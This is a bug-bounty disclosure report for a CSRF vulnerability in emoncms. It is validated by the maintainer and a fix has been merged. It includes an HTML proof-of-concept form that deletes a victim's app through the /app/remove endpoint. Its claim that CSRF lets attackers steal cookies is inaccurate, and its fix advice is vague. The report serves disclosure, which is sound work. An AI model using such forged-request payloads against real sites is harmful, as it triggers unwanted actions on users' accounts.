Cross-Site Request Forgery (CSRF) in emoncms/emoncms

Valid

Reported on

Jul 15th 2021


✍️ Description

In CSRF attack if your users going to attacker website and click the mallicouse link then they able to steal users cookie, submit unwanted date, ....

🕵️‍♂️ Proof of Concept

1.you login in your account 2.you make a file contain the following html file. 3.open html ( as victim site) 4.App named "My Electric" going to be deleted after click the "Submit request"

// PoC.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://emoncms.org/app/remove">
<input type="hidden" name="name" value="My&#32;Electric" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>


💥 Impact

the attacker can delete any App in the victim user's account.

Fix

you can set cookies on a custom header. this is a fastest way that you can protect your users

Occurrences

amammad modified the report
a year ago
We have contacted a member of the emoncms team and are waiting to hear back a year ago
emoncms/emoncms maintainer validated this vulnerability a year ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
emoncms/emoncms maintainer
a year ago

Thanks amammad!

emoncms/emoncms maintainer confirmed that a fix has been merged on ca1f5c a year ago
The fix bounty has been dropped
to join this conversation